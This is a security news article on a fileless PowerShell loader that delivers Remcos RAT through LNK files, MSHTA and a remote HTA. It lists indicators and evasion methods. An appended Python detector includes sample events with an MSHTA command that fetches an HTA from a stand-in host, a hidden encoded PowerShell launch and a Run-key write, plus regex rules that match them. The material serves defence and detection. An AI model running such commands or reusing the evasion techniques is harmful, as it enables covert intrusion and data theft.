Hackers Actively Exploiting PowerShell to Evade Antivirus & EDR

Cybersecurity experts have identified a concerning trend in the malware landscape as threat actors increasingly leverage fileless techniques to circumvent traditional security measures.

A sophisticated PowerShell-based shellcode loader executing Remcos Remote Access Trojan (RAT) has emerged as the latest example of this evolution, demonstrating how attackers are adapting their methods to remain undetected in compromised systems.

The attack begins with seemingly innocuous ZIP archives containing weaponized LNK files that, once executed, trigger a chain of events designed to leave minimal forensic evidence.


These files exploit proxy execution through trusted system binaries to establish persistence while operating almost entirely within memory, effectively bypassing signature-based detection mechanisms that rely on file scanning.

Qualys researchers identified this threat during routine threat hunting operations, noting its remarkable ability to evade traditional endpoint protection platforms.

“This malware exemplifies the growing sophistication of fileless attacks,” explained Prashant Pawar, Lead Threat Research Engineer at Qualys.

“By executing malicious code directly in memory and leveraging trusted Windows components, it remains virtually invisible to conventional security tools.”

The impact of such attacks extends beyond immediate system compromise. Once established, Remcos RAT provides attackers with extensive capabilities including screen capture, keylogging, credential theft from web browsers, and automated data exfiltration.

Attack Flow (Source – Qualys)

Its stealthy nature means infections can persist for extended periods, giving threat actors ample time to accomplish their objectives while defenders remain unaware of the breach.

The primary infection vector involves malicious email attachments disguised as tax documents.

When opened, these trigger a sophisticated execution chain that ultimately loads the Remcos RAT directly into memory without writing the malicious payload to disk.

Initial LNK file was detected and removed by Qualys EPP (Source – Qualys)

The initial LNK file was detected and removed by Qualys EPP, preventing the infection from establishing a foothold.

Detection Evasion Techniques

The shellcode loader employs several advanced techniques to avoid detection. At its core, the attack leverages PowerShell’s ability to execute code directly in memory, bypassing file-based scanning engines.

The malware authors have implemented multiple layers of obfuscation within their PowerShell scripts, including encrypted strings, dynamic API resolution, and binary padding to confuse automated analysis tools.

The attack chain begins when users interact with malicious LNK files that execute MSHTA with specifically crafted command arguments.

This triggers the download and execution of an HTA file (identified as xlab22.hta with hash 1b26f7e369e39312e4fcbc993d483b17) from command and control servers including mytaxclientcopy[.]com.

The HTA file subsequently launches PowerShell to execute the final payload.

Process Tree (Source – Qualys)

The process tree captured by Qualys EDR shows the parent-child process relationships that characterize this attack.

The visualization reveals how legitimate Windows processes are hijacked to execute malicious code, creating a complex chain that makes attribution and detection challenging for security teams.

The malware establishes persistence by modifying registry run keys, ensuring it survives system reboots without creating suspicious files on disk.

It also employs User Account Control bypass techniques to elevate privileges, allowing it to perform sensitive operations without triggering security alerts.

Security professionals are advised to implement comprehensive PowerShell logging, enable Antimalware Scan Interface (AMSI) monitoring, and deploy robust EDR solutions capable of detecting behavioral anomalies rather than relying solely on file signatures.
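As an added illustration of the behavioral detection recommended here (this is not code from Qualys or from the article), the following Python matches the chain described above, MSHTA launched with a remote HTA, PowerShell spawned by MSHTA with hidden or encoded-command flags, and a Run-key write by that PowerShell process, against constructed Sysmon-style events. The event shape, the c2.example host, the Run-key value name and the benign backup script are assumptions made for the sample.

```python
import re

# Constructed sample events in a simplified Sysmon-like shape (not real telemetry).
# Events 5, 6 and the registry write model the LNK -> MSHTA -> PowerShell chain;
# pid 7 is a benign scheduled PowerShell script that should not be flagged.
SAMPLE_EVENTS = [
    {"type": "process", "pid": 4, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"type": "process", "pid": 5, "ppid": 4, "image": "mshta.exe",
     "cmdline": "mshta.exe http://c2.example/xlab22.hta"},
    {"type": "process", "pid": 6, "ppid": 5, "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"type": "registry", "pid": 6, "image": "powershell.exe",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"type": "process", "pid": 7, "ppid": 4, "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

# MSHTA given a URL, a UNC path, or anything ending in .hta on its command line.
REMOTE_HTA = re.compile(r"(https?://|\\\\)\S+|\.hta\b", re.I)
# PowerShell launched with an encoded command, a hidden window, or no profile.
SUSPICIOUS_PS = re.compile(r"-(e|ec|enc|encodedcommand)\b|-w(indowstyle)?\s+hidden|-nop\b", re.I)
# Writes under the per-user or machine Run / RunOnce autostart keys.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)


def detect(events):
    """Return (pid, rule) findings for the MSHTA -> PowerShell -> Run-key chain."""
    by_pid = {e["pid"]: e for e in events if e["type"] == "process"}
    findings = []
    for e in events:
        if e["type"] == "process":
            name = e["image"].lower()
            parent = by_pid.get(e["ppid"])
            if name == "mshta.exe" and REMOTE_HTA.search(e["cmdline"]):
                findings.append((e["pid"], "mshta_remote_hta"))
            if name == "powershell.exe" and parent and parent["image"].lower() == "mshta.exe":
                findings.append((e["pid"], "powershell_spawned_by_mshta"))
            if name == "powershell.exe" and SUSPICIOUS_PS.search(e["cmdline"]):
                findings.append((e["pid"], "powershell_hidden_or_encoded"))
        elif e["type"] == "registry" and RUN_KEY.search(e["target"]):
            proc = by_pid.get(e["pid"])
            if proc and proc["image"].lower() in ("powershell.exe", "mshta.exe"):
                findings.append((e["pid"], "run_key_set_by_script_host"))
    return findings


if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

In a real deployment these rules would run over Sysmon Event ID 1 (process creation) and Event ID 13 (registry value set) alongside PowerShell script block logs, which capture the decoded content of the `-enc` payload.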

Early detection remains critical in preventing these sophisticated threats from establishing a persistent foothold in enterprise environments.


Tushar Subhra Dutta